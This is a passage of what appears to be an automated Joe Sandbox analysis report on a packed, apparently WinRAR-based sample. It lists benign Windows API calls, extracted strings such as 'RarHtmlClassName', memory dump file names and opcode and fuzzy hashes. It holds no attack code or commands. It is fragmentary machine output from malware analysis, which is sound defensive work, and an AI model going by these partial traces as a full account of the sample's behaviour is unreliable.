                                                                                                                                              • Instruction Fuzzy Hash: 2851E4B4F01209AFCB12CFA9D891AEEBBF9EF09300F14455AE951E72D1D7309940CB60
                                                                                                                                              APIs
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 002FC364
                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 002FC393
                                                                                                                                                • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 002FC3B1
                                                                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 002FC3C8
                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 002FC3DB
                                                                                                                                                • Part of subcall function 002F958C: GetDC.USER32(00000000), ref: 002F9598
                                                                                                                                                • Part of subcall function 002F958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 002F95A7
                                                                                                                                                • Part of subcall function 002F958C: ReleaseDC.USER32(00000000,00000000), ref: 002F95B5
                                                                                                                                                • Part of subcall function 002F9549: GetDC.USER32(00000000), ref: 002F9555
                                                                                                                                                • Part of subcall function 002F9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 002F9564
                                                                                                                                                • Part of subcall function 002F9549: ReleaseDC.USER32(00000000,00000000), ref: 002F9572
                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 002FC402
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 002FC409
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 002FC412
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                                                                              • String ID: STATIC
                                                                                                                                              • API String ID: 1444658586-1882779555
                                                                                                                                              • Opcode ID: a7e1a97da8aa6d5932e9a33f5df04c271f75f834bb75ff6684d9f2c6328a40f6
                                                                                                                                              • Instruction ID: cc66dab12baa1f269413f901cfa15b7bcdabd58273e4cedf417367182700e27d
                                                                                                                                              • Opcode Fuzzy Hash: a7e1a97da8aa6d5932e9a33f5df04c271f75f834bb75ff6684d9f2c6328a40f6
                                                                                                                                              • Instruction Fuzzy Hash: 7721967255022D7BE7226B648C46FFEB65CAF0A791F108031FB05B6191DB745A528AA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                              • API String ID: 0-2277559157
                                                                                                                                              • Opcode ID: d470c8e7b240a750050b17aa0862b6ff3be8d3408404d63c31dacf9783a24faf
                                                                                                                                              • Instruction ID: dba9a566e232826621c538ca98f7ebda1ba8f209098d40ce9599c1a5dddadfd8
                                                                                                                                              • Opcode Fuzzy Hash: d470c8e7b240a750050b17aa0862b6ff3be8d3408404d63c31dacf9783a24faf
                                                                                                                                              • Instruction Fuzzy Hash: 73F169316A43C1CBDF14DF668881BFE779D6F90300F884579ED468B287CA60986DCB62
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FA431
                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 002FA45E
                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 002FA473
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 002FA484
                                                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 002FA48D
                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 002FA4A1
                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002FA4B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                              • API String ID: 3214253823-2177901306
                                                                                                                                              • Opcode ID: b32a0631bb24f2b302b59ee0d4ce00c802305b671b856f896d18bdab96207e8b
                                                                                                                                              • Instruction ID: 3486e159cd5dc6cda910b8b6c4002ffcc9604094c94cc38e194562919d6f88ab
                                                                                                                                              • Opcode Fuzzy Hash: b32a0631bb24f2b302b59ee0d4ce00c802305b671b856f896d18bdab96207e8b
                                                                                                                                              • Instruction Fuzzy Hash: 0621B7722542197BD2125F25ED8DF7BBB6CEB4B7C4F018024F705E61A0C7E69D229632
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E926D
                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002E9290
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002E92AF
                                                                                                                                                • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
                                                                                                                                              • _swprintf.LIBCMT ref: 002E934B
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 002E93C0
                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 002E93FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                              • String ID: rtmp%d
                                                                                                                                              • API String ID: 2111052971-3303766350
                                                                                                                                              • Opcode ID: feb4b74e59879d13338c71d9dc25a6b285a232c0005d555a0afed91c8e454a26
                                                                                                                                              • Instruction ID: 622bca2cbc5d629fe5e8c3a8822bfb5c5d1324a5e777bd26787f69716d3c53da
                                                                                                                                              • Opcode Fuzzy Hash: feb4b74e59879d13338c71d9dc25a6b285a232c0005d555a0afed91c8e454a26
                                                                                                                                              • Instruction Fuzzy Hash: 6541A375861199A6DF21EFA2CD44EEE737CAF44381F8444A6B608E3042DA349BA5CF60
                                                                                                                                              APIs
                                                                                                                                              • __aulldiv.LIBCMT ref: 002F06F3
                                                                                                                                                • Part of subcall function 002EA995: GetVersionExW.KERNEL32(?), ref: 002EA9BA
                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 002F071C
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 002F072E
                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002F073B
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F0751
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F075D
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F0793
                                                                                                                                              • __aullrem.LIBCMT ref: 002F081D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1247370737-0
                                                                                                                                              • Opcode ID: 840c6e4b2c97a5efa1726079998c5e7c9c8332a2490bc39562142e7ba26f79a2
                                                                                                                                              • Instruction ID: 114695b6f800525c7332ad554e8a43804b375c3f0f7a1357138e0ef05e817774
                                                                                                                                              • Opcode Fuzzy Hash: 840c6e4b2c97a5efa1726079998c5e7c9c8332a2490bc39562142e7ba26f79a2
                                                                                                                                              • Instruction Fuzzy Hash: A14139B6408309AFC710DF65C8809ABF7E9FF88744F004A2EF69692251E735E558CB52
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 269201875-2989149754
                                                                                                                                              • Opcode ID: 2c2e827226395de318401dfcb54407c1bc00da6d5c11a62ab3930fca38bf6729
                                                                                                                                              • Instruction ID: 3e471f65c848b6df35a5cc12fb8870ee266b58d4b7f11018e40dd4c05267ce68
                                                                                                                                              • Opcode Fuzzy Hash: 2c2e827226395de318401dfcb54407c1bc00da6d5c11a62ab3930fca38bf6729
                                                                                                                                              • Instruction Fuzzy Hash: 7041CF36E013049FDB11DF78C891A6EB7A6EF89714F1685A8E515EB391D731AD01CB80
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002F87A0), ref: 002F8994
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002F89B5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocByteCharGlobalMultiWide
                                                                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                              • API String ID: 3286310052-4209811716
                                                                                                                                              • Opcode ID: 3a24be2ee196f785cdfa2f89b1eb2ae9014b8865acd2594dab05812007bbb992
                                                                                                                                              • Instruction ID: e969f28f9b859fc5c18b1d1c6c9c1e4e79d22bb70daf4709f5412ad8225355c4
                                                                                                                                              • Opcode Fuzzy Hash: 3a24be2ee196f785cdfa2f89b1eb2ae9014b8865acd2594dab05812007bbb992
                                                                                                                                              • Instruction Fuzzy Hash: CA31253211530A7ED316AF609C06FBFF79CDF46360F10452AF6109A2C1EFB5992587A6
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 002F8FFF
                                                                                                                                              • GetWindowRect.USER32(?,00000000), ref: 002F9044
                                                                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 002F90DB
                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 002F90E3
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 002F90F9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Show$RectText
                                                                                                                                              • String ID: RarHtmlClassName
                                                                                                                                              • API String ID: 3937224194-1658105358
                                                                                                                                              • Opcode ID: 855af773c724c063ac1b14cf943a58553361b2f52f724be4059c740bea815155
                                                                                                                                              • Instruction ID: 5468f633e794266f9a21ef5fb3e206b23b9ac6b8d962b79f9155a307027fa139
                                                                                                                                              • Opcode Fuzzy Hash: 855af773c724c063ac1b14cf943a58553361b2f52f724be4059c740bea815155
                                                                                                                                              • Instruction Fuzzy Hash: 1B31C431004215AFC7169F649C4CFABBBA8EF4D741F008569FA4AAA0A6CB35D961CB61
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0030B4CA: _free.LIBCMT ref: 0030B4F3
                                                                                                                                              • _free.LIBCMT ref: 0030B554
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 0030B55F
                                                                                                                                              • _free.LIBCMT ref: 0030B56A
                                                                                                                                              • _free.LIBCMT ref: 0030B5BE
                                                                                                                                              • _free.LIBCMT ref: 0030B5C9
                                                                                                                                              • _free.LIBCMT ref: 0030B5D4
                                                                                                                                              • _free.LIBCMT ref: 0030B5DF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                                                                                                                              • Instruction ID: da7f16ae951232a551427bc1dd665505db1cd6a262eb38e6158efa35ed4652e4
                                                                                                                                              • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                                                                                                                              • Instruction Fuzzy Hash: 30111272946708A6D562B771CC17FCFB7AC6F04B00F404815B79E6E1D3D765B6044650
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,?,0030168B,002FF0E2), ref: 003016A2
                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003016B0
                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003016C9
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0030168B,002FF0E2), ref: 0030171B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                              • Opcode ID: 9dba2f4370648632a31196111c05aa1f0bbcaa9c60f0f8102ccec80dcd43c7b5
                                                                                                                                              • Instruction ID: 34faa9302118e7dfbbcf7e2f2a9b24ea5d38e6995da9ae3f1503d11aa09ad93c
                                                                                                                                              • Opcode Fuzzy Hash: 9dba2f4370648632a31196111c05aa1f0bbcaa9c60f0f8102ccec80dcd43c7b5
                                                                                                                                              • Instruction Fuzzy Hash: BE012B3660B3255FE7272B787CA95A72B8CEB067B1B724339F514590E2EF624C009254
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                              • API String ID: 0-1718035505
                                                                                                                                              • Opcode ID: 5f388f63f2bef2c09b913044dccf6f16a1e6f767b0366988df42a770527c7f57
                                                                                                                                              • Instruction ID: be1f4598ff25d590e2ffd253d7a791140ab982e99e20a806006ba6d409e7842f
                                                                                                                                              • Opcode Fuzzy Hash: 5f388f63f2bef2c09b913044dccf6f16a1e6f767b0366988df42a770527c7f57
                                                                                                                                              • Instruction Fuzzy Hash: 94014472B6022B5F0F325FB45CD05F7A38AAA0ABC6710013AEE01C3212E750C8A1E7D0
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00306B29,?,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002), ref: 00306B98
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00306BAB
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00306B29,?,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002,00000000), ref: 00306BCE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                              • String ID: CorExitProcess$S#~>$mscoree.dll
                                                                                                                                              • API String ID: 4061214504-1754222316
                                                                                                                                              • Opcode ID: d9438bba82e7d8950e75ee3df783623228627918cdffef6b3671e1d5126f7354
                                                                                                                                              • Instruction ID: 54263a987dd5a70d0ddede7668c69a48727a023d3ceb4103fea95d553c163c99
                                                                                                                                              • Opcode Fuzzy Hash: d9438bba82e7d8950e75ee3df783623228627918cdffef6b3671e1d5126f7354
                                                                                                                                              • Instruction Fuzzy Hash: 9EF04471A0121DBBCB179B91DC19BDEBFBCEB0C715F014164F905E2190DB745A64CB90
                                                                                                                                              APIs
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F096E
                                                                                                                                                • Part of subcall function 002EA995: GetVersionExW.KERNEL32(?), ref: 002EA9BA
                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F0990
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F09AA
                                                                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002F09BB
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F09CB
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F09D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                              • Opcode ID: 5018b48a5951183a5bb13e574f01890349d603c11a0dd28a09e8374afdafcd99
